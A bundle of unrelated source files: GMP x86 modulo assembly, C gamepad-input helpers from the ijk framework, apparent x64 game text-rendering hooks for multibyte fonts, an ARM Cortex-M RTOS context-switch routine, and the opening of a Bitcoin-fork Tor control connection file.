C mp_limb_t mpn_preinv_mod_1 (mp_srcptr src, mp_size_t size, mp_limb_t divisor,
C mp_limb_t inverse);
C
C This code is not unlike mpn/x86/p6/mod_1.asm, it does the same sort of
C multiply by inverse without on-the-fly shifts. See that code for some
C general comments.
C
C Alternatives:
C
C P5 shldl is 4 cycles, so shifting on the fly would be at least 5 cycles
C slower, probably more depending what it did to register usage. Using MMX
C on P55 would be better, but still at least 4 or 5 instructions and so 2 or
C 3 cycles.
dnl These thresholds are the sizes where the multiply by inverse method is
dnl used, rather than plain "divl"s. Minimum value 2.
dnl
dnl MUL_NORM_THRESHOLD is for an already normalized divisor (high bit set),
dnl MUL_UNNORM_THRESHOLD for an unnormalized divisor.
dnl
dnl With the divl loop at 44 c/l and the inverse at 28 c/l with about 70
dnl cycles to setup, the threshold should be about ceil(70/16)==5, which is
dnl what happens in practice.
dnl
dnl An unnormalized divisor gets an extra 40 cycles at the end for the
dnl final (r*2^n)%(d*2^n) and shift. This increases the threshold by about
dnl 40/16=3.
dnl
dnl PIC adds between 4 and 7 cycles (not sure why it varies), but this
dnl doesn't change the thresholds.
dnl
dnl The entry sequence code that chooses between MUL_NORM_THRESHOLD and
dnl MUL_UNNORM_THRESHOLD is a bit horrible, but it adds only 2 cycles
dnl (branch free) and ensures the choice between div or mul is optimal.
deflit(MUL_NORM_THRESHOLD, ifdef(`PIC',5,5))
deflit(MUL_UNNORM_THRESHOLD, ifdef(`PIC',8,8))
deflit(MUL_NORM_DELTA, eval(MUL_NORM_THRESHOLD - MUL_UNNORM_THRESHOLD))
defframe(PARAM_INVERSE, 16) dnl mpn_preinv_mod_1
defframe(PARAM_CARRY, 16) dnl mpn_mod_1c
defframe(PARAM_DIVISOR, 12)
defframe(PARAM_SIZE, 8)
defframe(PARAM_SRC, 4)
dnl re-using parameter space
define(VAR_NORM, `PARAM_DIVISOR')
define(VAR_INVERSE, `PARAM_SIZE')
TEXT
ALIGN(8)
PROLOGUE(mpn_preinv_mod_1)
deflit(`FRAME',0)
pushl %ebp FRAME_pushl()
pushl %esi FRAME_pushl()
movl PARAM_SRC, %esi
movl PARAM_SIZE, %edx
pushl %edi FRAME_pushl()
pushl %ebx FRAME_pushl()
movl PARAM_DIVISOR, %ebp
movl PARAM_INVERSE, %eax
movl -4(%esi,%edx,4), %edi C src high limb
leal -8(%esi,%edx,4), %esi C &src[size-2]
movl $0, VAR_NORM
decl %edx
jnz L(start_preinv)
subl %ebp, %edi C src-divisor
popl %ebx
sbbl %ecx, %ecx C -1 if underflow
movl %edi, %eax C src-divisor
andl %ebp, %ecx C d if underflow
popl %edi
addl %ecx, %eax C remainder, with possible addback
popl %esi
popl %ebp
ret
EPILOGUE()
ALIGN(8)
PROLOGUE(mpn_mod_1c)
deflit(`FRAME',0)
movl PARAM_DIVISOR, %eax
movl PARAM_SIZE, %ecx
sarl $31, %eax C d highbit
movl PARAM_CARRY, %edx
orl %ecx, %ecx
jz L(done_edx) C result==carry if size==0
andl $MUL_NORM_DELTA, %eax
pushl %ebp FRAME_pushl()
addl $MUL_UNNORM_THRESHOLD, %eax C norm or unnorm thresh
pushl %esi FRAME_pushl()
movl PARAM_SRC, %esi
movl PARAM_DIVISOR, %ebp
cmpl %eax, %ecx
jb L(divide_top)
movl %edx, %eax C carry as pretend src high limb
leal 1(%ecx), %edx C size+1
cmpl $0x1000000, %ebp
jmp L(mul_by_inverse_1c)
EPILOGUE()
ALIGN(8)
PROLOGUE(mpn_mod_1)
deflit(`FRAME',0)
movl PARAM_SIZE, %ecx
pushl %ebp FRAME_pushl()
orl %ecx, %ecx
jz L(done_zero)
movl PARAM_SRC, %eax
movl PARAM_DIVISOR, %ebp
sarl $31, %ebp C -1 if divisor normalized
movl -4(%eax,%ecx,4), %eax C src high limb
movl PARAM_DIVISOR, %edx
pushl %esi FRAME_pushl()
andl $MUL_NORM_DELTA, %ebp
cmpl %edx, %eax C carry flag if high<divisor
sbbl %edx, %edx C -1 if high<divisor
addl $MUL_UNNORM_THRESHOLD, %ebp C norm or unnorm thresh
addl %edx, %ecx C size-1 if high<divisor
jz L(done_eax)
cmpl %ebp, %ecx
movl PARAM_DIVISOR, %ebp
movl PARAM_SRC, %esi
jae L(mul_by_inverse)
andl %eax, %edx C high as initial carry if high<divisor
L(divide_top):
C eax scratch (quotient)
C ebx
C ecx counter, limbs, decrementing
C edx scratch (remainder)
C esi src
C edi
C ebp divisor
movl -4(%esi,%ecx,4), %eax
divl %ebp
decl %ecx
jnz L(divide_top)
popl %esi
popl %ebp
L(done_edx):
movl %edx, %eax
ret
L(done_zero):
xorl %eax, %eax
popl %ebp
ret
C -----------------------------------------------------------------------------
C
C The divisor is normalized using the same code as the pentium
C count_leading_zeros in longlong.h. Going through the GOT for PIC costs a
C couple of cycles, but is more or less unavoidable.
ALIGN(8)
L(mul_by_inverse):
C eax src high limb
C ebx
C ecx size or size-1
C edx
C esi src
C edi
C ebp divisor
movl PARAM_SIZE, %edx
cmpl $0x1000000, %ebp
L(mul_by_inverse_1c):
sbbl %ecx, %ecx
cmpl $0x10000, %ebp
sbbl $0, %ecx
cmpl $0x100, %ebp
sbbl $0, %ecx
pushl %edi FRAME_pushl()
pushl %ebx FRAME_pushl()
movl %ebp, %ebx C d
ifdef(`PIC',`
call L(here)
L(here):
popl %edi
leal 25(,%ecx,8), %ecx C 0,-1,-2,-3 -> 25,17,9,1
shrl %cl, %ebx
addl $_GLOBAL_OFFSET_TABLE_+[.-L(here)], %edi
C AGI
movl __clz_tab@GOT(%edi), %edi
addl $-34, %ecx
C AGI
movb (%ebx,%edi), %bl
',`
leal 25(,%ecx,8), %ecx C 0,-1,-2,-3 -> 25,17,9,1
shrl %cl, %ebx
addl $-34, %ecx
C AGI
movb __clz_tab(%ebx), %bl
')
movl %eax, %edi C carry -> n1
addl %ebx, %ecx C -34 + c + __clz_tab[d>>c] = -clz-1
leal -8(%esi,%edx,4), %esi C &src[size-2]
xorl $-1, %ecx C clz
movl $-1, %edx
ASSERT(e,`pushl %eax C clz calculation same as bsrl
bsrl %ebp, %eax
xorl $31, %eax
cmpl %eax, %ecx
popl %eax')
shll %cl, %ebp C d normalized
movl %ecx, VAR_NORM
subl %ebp, %edx C (b-d)-1, so edx:eax = b*(b-d)-1
movl $-1, %eax
divl %ebp C floor (b*(b-d)-1) / d
L(start_preinv):
movl %eax, VAR_INVERSE
movl %ebp, %eax C d
movl %ecx, %edx C fake high, will cancel
C For mpn_mod_1 and mpn_preinv_mod_1, the initial carry in %edi is the src
C high limb, and this may be greater than the divisor and may need one copy
C of the divisor subtracted (only one, because the divisor is normalized).
C This is accomplished by having the initial ecx:edi act as a fake previous
C n2:n10. The initial edx:eax is d, acting as a fake (q1+1)*d which is
C subtracted from ecx:edi, with the usual addback if it produces an
C underflow.
L(inverse_top):
C eax scratch (n10, n1, q1, etc)
C ebx scratch (nadj, src limit)
C ecx old n2
C edx scratch
C esi src pointer, &src[size-2] to &src[0]
C edi old n10
C ebp d
subl %eax, %edi C low n - (q1+1)*d
movl (%esi), %eax C new n10
sbbl %edx, %ecx C high n - (q1+1)*d, 0 or -1
movl %ebp, %ebx C d
sarl $31, %eax C -n1
andl %ebp, %ecx C d if underflow
addl %edi, %ecx C remainder -> n2, and possible addback
ASSERT(b,`cmpl %ebp, %ecx')
andl %eax, %ebx C -n1 & d
movl (%esi), %edi C n10
andl $1, %eax C n1
addl %ecx, %eax C n2+n1
addl %edi, %ebx C nadj = n10 + (-n1 & d), ignoring overflow
mull VAR_INVERSE C m*(n2+n1)
addl %eax, %ebx C low(m*(n2+n1) + nadj), giving carry flag
leal 1(%ecx), %eax C 1+n2
adcl %edx, %eax C 1 + high[n2<<32 + m*(n2+n1) + nadj] = q1+1
movl PARAM_SRC, %ebx
sbbl $0, %eax C use q1 if q1+1 overflows
subl $4, %esi C step src ptr
mull %ebp C (q1+1)*d
cmpl %ebx, %esi
jae L(inverse_top)
C %edi (after subtract and addback) is the remainder modulo d*2^n
C and must be reduced to 0<=r<d by calculating r*2^n mod d*2^n and
C right shifting by n.
C
C If d was already normalized on entry so that n==0 then nothing is
C needed here. This is always the case for preinv_mod_1. For mod_1
C or mod_1c the chance of n==0 is low, but about 40 cycles can be
C saved.
subl %eax, %edi C low n - (q1+1)*d
movl %ecx, %ebx C n2
sbbl %edx, %ebx C high n - (q1+1)*d, 0 or -1
xorl %esi, %esi C next n2
andl %ebp, %ebx C d if underflow
movl VAR_NORM, %ecx
addl %ebx, %edi C remainder, with possible addback
orl %ecx, %ecx
jz L(done_mul_edi)
C Here using %esi=n2 and %edi=n10, unlike the above
shldl( %cl, %edi, %esi) C n2
shll %cl, %edi C n10
movl %edi, %eax C n10
movl %edi, %ebx C n10
sarl $31, %ebx C -n1
shrl $31, %eax C n1
andl %ebp, %ebx C -n1 & d
addl %esi, %eax C n2+n1
addl %edi, %ebx C nadj = n10 + (-n1 & d), ignoring overflow
mull VAR_INVERSE C m*(n2+n1)
addl %eax, %ebx C m*(n2+n1) + nadj, low giving carry flag
leal 1(%esi), %eax C 1+n2
adcl %edx, %eax C 1 + high(n2<<32 + m*(n2+n1) + nadj) = q1+1
sbbl $0, %eax C use q1 if q1+1 overflows
mull %ebp C (q1+1)*d
subl %eax, %edi C low n - (q1+1)*d
popl %ebx
sbbl %edx, %esi C high n - (q1+1)*d, 0 or -1
movl %edi, %eax
andl %ebp, %esi C d if underflow
popl %edi
addl %esi, %eax C addback if underflow
popl %esi
shrl %cl, %eax C denorm remainder
popl %ebp
ret
L(done_mul_edi):
movl %edi, %eax
popl %ebx
popl %edi
L(done_eax):
popl %esi
popl %ebp
ret
EPILOGUE()
|
/*
Copyright 2020-2021 Daniel S. Buckstein
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
/*
ijk: an open-source, cross-platform, light-weight,
c-based rendering framework
By Daniel S. Buckstein
ijkGamepad.inl
Gamepad/controller/handheld input device inline implementation.
*/
#ifdef _IJK_GAMEPAD_H_
#ifndef _IJK_GAMEPAD_INL_
#define _IJK_GAMEPAD_INL_
//-----------------------------------------------------------------------------
ijk_inl iret ijkGamepadGetButtonState(ijkGamepadState const* const gamepad, ibool state_out[1], ijkGamepadBtn const button)
{
if (gamepad && state_out)
{
*state_out = (ibool)ijk_flagch(gamepad->state.button, button);
return ijk_success;
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadIsButtonDown(ijkGamepadState const* const gamepad, ijkGamepadBtn const button)
{
if (gamepad)
{
return ijk_flagch(gamepad->state.button, button);
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadIsButtonUp(ijkGamepadState const* const gamepad, ijkGamepadBtn const button)
{
if (gamepad)
{
return ijk_flagnch(gamepad->state.button, button);
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadIsButtonDownAgain(ijkGamepadState const* const gamepad, ijkGamepadBtn const button)
{
if (gamepad)
{
return ijk_flagch(gamepad->button_downAgain, button);
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadIsButtonUpAgain(ijkGamepadState const* const gamepad, ijkGamepadBtn const button)
{
if (gamepad)
{
return ijk_flagnch(gamepad->button_upAgain, button);
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadIsButtonPressed(ijkGamepadState const* const gamepad, ijkGamepadBtn const button)
{
if (gamepad)
{
return ijk_flagch(gamepad->button_pressed, button);
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadIsButtonReleased(ijkGamepadState const* const gamepad, ijkGamepadBtn const button)
{
if (gamepad)
{
return ijk_flagch(gamepad->button_released, button);
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadGetConnectionState(ijkGamepadState const* const gamepad, ibool state_out[1])
{
if (gamepad && state_out)
{
*state_out = (ibool)ijk_istrue(gamepad->state.connected);
return ijk_success;
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadIsConnected(ijkGamepadState const* const gamepad)
{
if (gamepad)
{
return (gamepad->state.connected);
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadIsNotConnected(ijkGamepadState const* const gamepad)
{
if (gamepad)
{
return !(gamepad->state.connected);
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadIsConnectedAgain(ijkGamepadState const* const gamepad)
{
if (gamepad)
{
return (gamepad->state.connected && gamepad->state_prev.connected);
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadIsNotConnectedAgain(ijkGamepadState const* const gamepad)
{
if (gamepad)
{
return !(gamepad->state.connected || gamepad->state_prev.connected);
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadReconnected(ijkGamepadState const* const gamepad)
{
if (gamepad)
{
return (gamepad->state.connected && !gamepad->state_prev.connected);
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadDisconnected(ijkGamepadState const* const gamepad)
{
if (gamepad)
{
return (gamepad->state_prev.connected && !gamepad->state.connected);
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadGetTriggerLeft(ijkGamepadState const* const gamepad, dbl v_out[1])
{
if (gamepad && v_out)
{
*v_out = gamepad->state.trigger_left_unit;
return ijk_success;
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadGetTriggerRight(ijkGamepadState const* const gamepad, dbl v_out[1])
{
if (gamepad && v_out)
{
*v_out = gamepad->state.trigger_right_unit;
return ijk_success;
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadGetTriggers(ijkGamepadState const* const gamepad, dbl vl_out[1], dbl vr_out[1])
{
if (gamepad && vl_out && vr_out)
{
*vl_out = gamepad->state.trigger_left_unit;
*vr_out = gamepad->state.trigger_right_unit;
return ijk_success;
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadGetTriggerLeftChange(ijkGamepadState const* const gamepad, dbl dv_out[1])
{
if (gamepad && dv_out)
{
*dv_out = (gamepad->state.trigger_left_unit - gamepad->state_prev.trigger_left_unit);
return ijk_success;
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadGetTriggerRightChange(ijkGamepadState const* const gamepad, dbl dv_out[1])
{
if (gamepad && dv_out)
{
*dv_out = (gamepad->state.trigger_right_unit - gamepad->state_prev.trigger_right_unit);
return ijk_success;
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadGetTriggersChange(ijkGamepadState const* const gamepad, dbl dvl_out[1], dbl dvr_out[1])
{
if (gamepad && dvl_out && dvr_out)
{
*dvl_out = (gamepad->state.trigger_left_unit - gamepad->state_prev.trigger_left_unit);
*dvr_out = (gamepad->state.trigger_right_unit - gamepad->state_prev.trigger_right_unit);
return ijk_success;
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadGetThumbstickLeft(ijkGamepadState const* const gamepad, dbl v_out[2])
{
if (gamepad && v_out)
{
v_out[0] = gamepad->state.thumbX_left_unit;
v_out[1] = gamepad->state.thumbY_left_unit;
return ijk_success;
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadGetThumbstickRight(ijkGamepadState const* const gamepad, dbl v_out[2])
{
if (gamepad && v_out)
{
v_out[0] = gamepad->state.thumbX_right_unit;
v_out[1] = gamepad->state.thumbY_right_unit;
return ijk_success;
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadGetThumbsticks(ijkGamepadState const* const gamepad, dbl vl_out[2], dbl vr_out[2])
{
if (gamepad && vl_out && vr_out)
{
vl_out[0] = gamepad->state.thumbX_left_unit;
vl_out[1] = gamepad->state.thumbY_left_unit;
vr_out[0] = gamepad->state.thumbX_right_unit;
vr_out[1] = gamepad->state.thumbY_right_unit;
return ijk_success;
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadGetThumbstickLeftChange(ijkGamepadState const* const gamepad, dbl dv_out[2])
{
if (gamepad && dv_out)
{
dv_out[0] = (gamepad->state.thumbX_left_unit - gamepad->state_prev.thumbX_left_unit);
dv_out[1] = (gamepad->state.thumbY_left_unit - gamepad->state_prev.thumbY_left_unit);
return ijk_success;
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadGetThumbstickRightChange(ijkGamepadState const* const gamepad, dbl dv_out[2])
{
if (gamepad && dv_out)
{
dv_out[0] = (gamepad->state.thumbX_right_unit - gamepad->state_prev.thumbX_right_unit);
dv_out[1] = (gamepad->state.thumbY_right_unit - gamepad->state_prev.thumbY_right_unit);
return ijk_success;
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadGetThumbsticksChange(ijkGamepadState const* const gamepad, dbl dvl_out[2], dbl dvr_out[2])
{
if (gamepad && dvl_out && dvr_out)
{
dvl_out[0] = (gamepad->state.thumbX_left_unit - gamepad->state_prev.thumbX_left_unit);
dvl_out[1] = (gamepad->state.thumbY_left_unit - gamepad->state_prev.thumbY_left_unit);
dvr_out[0] = (gamepad->state.thumbX_right_unit - gamepad->state_prev.thumbX_right_unit);
dvr_out[1] = (gamepad->state.thumbY_right_unit - gamepad->state_prev.thumbY_right_unit);
return ijk_success;
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadSetID(ijkGamepadState* const gamepad, ijkGamepadID const gamepadID)
{
if (gamepad)
{
gamepad->ctrlID = gamepadID;
return ijkGamepadUpdate(gamepad);
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadReset(ijkGamepadState* const gamepad)
{
ptr ijkMemorySetZero(ptr const dst, size const sz_bytes);
if (gamepad)
{
ijkMemorySetZero(gamepad->packet, (szb(gamepad->packet) + szb(gamepad->state)));
return ijk_success;
}
return ijk_fail_invalidparams;
}
//-----------------------------------------------------------------------------
#endif // !_IJK_GAMEPAD_INL_
#endif // _IJK_GAMEPAD_H_ |
EXTERN mapViewProc1ReturnAddress : QWORD
EXTERN mapViewProc2ReturnAddress : QWORD
EXTERN mapViewProc3ReturnAddress : QWORD
EXTERN mapViewProc3CallAddress : QWORD
EXTERN mapViewProc3CallAddress : QWORD
ESCAPE_SEQ_1 = 10h
ESCAPE_SEQ_2 = 11h
ESCAPE_SEQ_3 = 12h
ESCAPE_SEQ_4 = 13h
LOW_SHIFT = 0Eh
HIGH_SHIFT = 9h
SHIFT_2 = LOW_SHIFT
SHIFT_3 = 900h
SHIFT_4 = 8F2h
NO_FONT = 98Fh
NOT_DEF = 2026h
; temporary space for code point
.DATA
mapViewProc3TmpCharacterAddress DQ 0
.CODE
mapViewProc1 PROC
cmp byte ptr [rax+r8], ESCAPE_SEQ_1;
jz JMP_A;
cmp byte ptr [rax+r8], ESCAPE_SEQ_2;
jz JMP_B;
cmp byte ptr [rax+r8], ESCAPE_SEQ_3;
jz JMP_C;
cmp byte ptr [rax+r8], ESCAPE_SEQ_4;
jz JMP_D;
jmp JMP_E;
JMP_A:
movzx eax, word ptr [rax + r8 + 1];
jmp JMP_F;
JMP_B:
movzx eax, word ptr [rax + r8 + 1];
sub eax, SHIFT_2;
jmp JMP_F;
JMP_C:
movzx eax, word ptr [rax + r8 + 1];
add eax, SHIFT_3;
jmp JMP_F;
JMP_D:
movzx eax, word ptr [rax + r8 + 1];
add eax, SHIFT_4;
JMP_F:
add ebx, 2;
add r8d, 2;
movzx eax, ax;
cmp eax, NO_FONT;
ja JMP_G;
mov eax, NOT_DEF;
jmp JMP_G;
JMP_E:
movzx eax, byte ptr [rax + r8];
mov r11, qword ptr [ rdi + rax * 8];
JMP_G:
mov r11, qword ptr [ rdi + rax * 8];
;issue-161
cmp r11,0;
jnz JMP_N;
mov eax, 2dh ; -
mov r11, qword ptr [ rdi + rax * 8];
JMP_N:
mov qword ptr [rbp + 38h], r11;
movss dword ptr [rbp + 40h], xmm2
push mapViewProc1ReturnAddress;
ret;
mapViewProc1 ENDP
;-------------------------------------------;
mapViewProc2 PROC
lea r9, [r12 + 100h];
cmp byte ptr[rax + r15], ESCAPE_SEQ_1;
jz JMP_A;
cmp byte ptr[rax + r15], ESCAPE_SEQ_2;
jz JMP_B;
cmp byte ptr[rax + r15], ESCAPE_SEQ_3;
jz JMP_C;
cmp byte ptr[rax + r15], ESCAPE_SEQ_4;
jz JMP_D;
movzx eax, byte ptr[rax + r15];
jmp JMP_E;
JMP_A:
movzx eax, word ptr[rax + r15 + 1];
jmp JMP_F;
JMP_B:
movzx eax, word ptr[rax + r15 + 1];
sub eax, SHIFT_2;
jmp JMP_F;
JMP_C:
movzx eax, word ptr[rax + r15 + 1];
add eax, SHIFT_3;
jmp JMP_F;
JMP_D:
movzx eax, word ptr[rax + r15 + 1];
add eax, SHIFT_4;
JMP_F:
add esi, 2;
add r15, 2;
movzx eax, ax;
cmp eax, NO_FONT;
ja JMP_E;
JMP_G:
mov eax, NOT_DEF;
JMP_E:
mov r12, qword ptr [r9 + rax * 8];
push mapViewProc2ReturnAddress;
ret;
mapViewProc2 ENDP
;-------------------------------------------;
mapViewProc2V130 PROC
lea r9, [r12 + 120h];
cmp byte ptr[rax + r15], ESCAPE_SEQ_1;
jz JMP_A;
cmp byte ptr[rax + r15], ESCAPE_SEQ_2;
jz JMP_B;
cmp byte ptr[rax + r15], ESCAPE_SEQ_3;
jz JMP_C;
cmp byte ptr[rax + r15], ESCAPE_SEQ_4;
jz JMP_D;
movzx eax, byte ptr[rax + r15];
jmp JMP_E;
JMP_A:
movzx eax, word ptr[rax + r15 + 1];
jmp JMP_F;
JMP_B:
movzx eax, word ptr[rax + r15 + 1];
sub eax, SHIFT_2;
jmp JMP_F;
JMP_C:
movzx eax, word ptr[rax + r15 + 1];
add eax, SHIFT_3;
jmp JMP_F;
JMP_D:
movzx eax, word ptr[rax + r15 + 1];
add eax, SHIFT_4;
JMP_F:
add esi, 2;
add r15, 2;
movzx eax, ax;
cmp eax, NO_FONT;
ja JMP_E;
JMP_G:
mov eax, NOT_DEF;
JMP_E:
mov r12, qword ptr [r9 + rax * 8];
push mapViewProc2ReturnAddress;
ret;
mapViewProc2V130 ENDP
;-------------------------------------------;
mapViewProc3 PROC
mov qword ptr[rsp + 488h - 448h],0;
cmp byte ptr [rax + r15], ESCAPE_SEQ_1;
jz JMP_A;
cmp byte ptr [rax + r15], ESCAPE_SEQ_2;
jz JMP_A;
cmp byte ptr [rax + r15], ESCAPE_SEQ_3;
jz JMP_A;
cmp byte ptr [rax + r15], ESCAPE_SEQ_4;
jz JMP_A;
movzx r8d, byte ptr[rax + r15];
mov edx, 1;
lea rcx, qword ptr [rsp + 488h - 448h];
call mapViewProc3CallAddress;
jmp JMP_B;
JMP_A:
lea r8, qword ptr [rax + r15];
mov mapViewProc3TmpCharacterAddress, r8;
movzx r8d, byte ptr[rax + r15];
mov edx, 3; The memory is allocated 3 byte, but the first byte is copied 3 times.
lea rcx, qword ptr [rsp + 488h - 448h];
call mapViewProc3CallAddress;
; overwrite
mov rcx, mapViewProc3TmpCharacterAddress;
mov cx, word ptr [rcx+1];
mov word ptr [rax+1], cx;
JMP_B:
push mapViewProc3ReturnAddress;
ret;
mapViewProc3 ENDP
END |
;*******************************************************************************
; PUBLIC FUNCTIONS
;*******************************************************************************
; Functions declared in this file
PUBLIC Inc8 ; U8 Inc8(U8 *data);
PUBLIC Dec8 ; U8 Dec8(U8 *data);
PUBLIC IRQ_ENABLE_RESTORE; void IRQ_ENABLE_RESTORE(void) ;
PUBLIC IRQ_DISABLE_SAVE ; void IRQ_DISABLE_SAVE(void) ;
PUBLIC SwitchContext ; void SwitchContext(void);
PUBLIC PendSV_Handler ; void PendSV_Handler(void);
PUBLIC SetEnvironment ; void SetEnvironment(void);
EXTERN TCBRunning
EXTERN TCBNext
EXTERN OSSchedLock
;*******************************************************************************
; EQUATES
;*******************************************************************************
NVIC_INT_CTRL EQU 0xE000ED04 ; Interrupt control state register
NVIC_SYSPRI2 EQU 0xE000ED22 ; System priority register (PendSV 14)
NVIC_PENDSV_PRI EQU 0xFF ; PendSV priority value (Lowest)
NVIC_PENDSVSET EQU 0x10000000 ; Value to trigger PendSV exception
RSEG CODE:CODE(2)
thumb
;U8 Inc8(U8 *data);
Inc8
PUSH {R1}
CPSID I
LDRB R1,[R0]
ADDS R1,#1
STRB R1,[R0]
CPSIE I
SUBS R1,#1
MOVS R0,R1
POP {R1}
BX LR
;U8 Dec8 (U8 *data);
Dec8
PUSH {R1}
CPSID I
LDRB R1,[R0]
SUBS R1,#1
STRB R1,[R0]
CPSIE I
MOVS R0,R1
POP {R1}
BX LR
IRQ_ENABLE_RESTORE
CPSIE I
BX LR
IRQ_DISABLE_SAVE
CPSID I
BX LR
SetEnvironment
SUBS R0, #28
MSR PSP, R0
BX LR
; void SwitchContext(void)
SwitchContext
LDR R0, =NVIC_INT_CTRL ; Trigger the PendSV exception (causes context switch)
LDR R1, =NVIC_PENDSVSET
STR R1, [R0]
BX LR
; void PendSV_Handler(void)
PendSV_Handler
LDR R3,=TCBRunning
LDR R1,[R3] ; R1 == running tcb
LDR R2,=TCBNext
LDR R2,[R2] ; R2 == next tcb
CMP R1,R2
BEQ exitPendSV
MRS R0, PSP ; Get PSP point (can not use PUSH,in ISR,SP is MSP )
SUBS R0,R0,#32
STR R0,[R1] ; Save orig PSP
; Store r4-r11,r0 -= regCnt * 4,r0 is new stack
; top point (addr h->l r11,r10,...,r5,r4)
STMIA R0!,{R4-R7} ; Save old context (R4-R7)
MOV R4,R8
MOV R5,R9
MOV R6,R10
MOV R7,R11
STMIA R0!,{R4-R7} ; Save old context (R8-R11)
popStk
STR R2, [R3] ; TCBRunning = TCBNext;
LDR R0, [R2] ; Get SP of task that be switch into.
ADDS R0, R0,#16
LDMIA R0!,{R4-R7} ; Restore new Context (R8-R11)
MOV R8,R4
MOV R9,R5
MOV R10,R6
MOV R11,R7
SUBS R0,R0,#32
LDMIA R0!,{R4-R7} ; Restore new Context (R4-R7)
ADDS R0, R0,#16
MSR PSP, R0 ; Mov new stack point to PSP
exitPendSV
LDR R3,=OSSchedLock
MOVS R0, #0x0
STRB R0, [R3]
MOVS R0,#4
RSBS R0,R0,#0 ; =0xFFFFFFFC,Ensure exception return uses process stack
BX R0 ; Exit interrupt
END
|
// Copyright (c) 2015-2017 The Bitcoin Core developers
// Copyright (c) 2017-2018 The Toschain Core developers
// Copyright (c) 2017 The Zcash developers
// Distributed under the MIT software license, see the accompanying
// file COPYING or http://www.opensource.org/licenses/mit-license.php.
#include <torcontrol.h>
#include <utilstrencodings.h>
#include <netbase.h>
#include <net.h>
#include <util.h>
#include <crypto/hmac_sha256.h>
#include <vector>
#include <deque>
#include <set>
#include <stdlib.h>
#include <boost/bind.hpp>
#include <boost/signals2/signal.hpp>
#include <boost/algorithm/string/split.hpp>
#include <boost/algorithm/string/classification.hpp>
#include <boost/algorithm/string/replace.hpp>
#include <event2/bufferevent.h>
#include <event2/buffer.h>
#include <event2/util.h>
#include <event2/event.h>
#include <event2/thread.h>
/** Default control port */
const std::string DEFAULT_TOR_CONTROL = "127.0.0.1:9051";
/** Tor cookie size (from control-spec.txt) */
static const int TOR_COOKIE_SIZE = 32;
/** Size of client/server nonce for SAFECOOKIE */
static const int TOR_NONCE_SIZE = 32;
/** For computing serverHash in SAFECOOKIE */
static const std::string TOR_SAFE_SERVERKEY = "Tor safe cookie authentication server-to-controller hash";
/** For computing clientHash in SAFECOOKIE */
static const std::string TOR_SAFE_CLIENTKEY = "Tor safe cookie authentication controller-to-server hash";
/** Exponential backoff configuration - initial timeout in seconds */
static const float RECONNECT_TIMEOUT_START = 1.0;
/** Exponential backoff configuration - growth factor */
static const float RECONNECT_TIMEOUT_EXP = 1.5;
/** Maximum length for lines received on TorControlConnection.
* tor-control-spec.txt mentions that there is explicitly no limit defined to line length,
* this is belt-and-suspenders sanity limit to prevent memory exhaustion.
*/
static const int MAX_LINE_LENGTH = 100000;
/****** Low-level TorControlConnection ********/
/** Reply from Tor, can be single or multi-line */
class TorControlReply
{
public:
TorControlReply() { Clear(); }
int code;
std::vector<std::string> lines;
void Clear()
{
code = 0;
lines.clear();
}
};
/** Low-level handling for Tor control connection.
* Speaks the SMTP-like protocol as defined in torspec/control-spec.txt
*/
class TorControlConnection
{
public:
typedef std::function<void(TorControlConnection&)> ConnectionCB;
typedef std::function<void(TorControlConnection &,const TorControlReply &)> ReplyHandlerCB;
/** Create a new TorControlConnection.
*/
explicit TorControlConnection(struct event_base *base);
~TorControlConnection();
/**
* Connect to a Tor control port.
* target is address of the form host:port.
* connected is the handler that is called when connection is successfully established.
* disconnected is a handler that is called when the connection is broken.
* Return true on success.
*/
bool Connect(const std::string &target, const ConnectionCB& connected, const ConnectionCB& disconnected);
/**
* Disconnect from Tor control port.
*/
bool Disconnect();
/** Send a command, register a handler for the reply.
* A trailing CRLF is automatically added.
* Return true on success.
*/
bool Command(const std::string &cmd, const ReplyHandlerCB& reply_handler);
/** Response handlers for async replies */
boost::signals2::signal<void(TorControlConnection &,const TorControlReply &)> async_handler;
private:
/** Callback when ready for use */
std::function<void(TorControlConnection&)> connected;
/** Callback when connection lost */
std::function<void(TorControlConnection&)> disconnected;
/** Libevent event base */
struct event_base *base;
/** Connection to control socket */
struct bufferevent *b_conn;
/** Message being received */
TorControlReply message;
/** Response handlers */
std::deque<ReplyHandlerCB> reply_handlers;
/** Libevent handlers: internal */
static void readcb(struct bufferevent *bev, void *ctx);
static void eventcb(struct bufferevent *bev, short what, void *ctx);
};
TorControlConnection::TorControlConnection(struct event_base *_base):
base(_base), b_conn(nullptr)
{
}
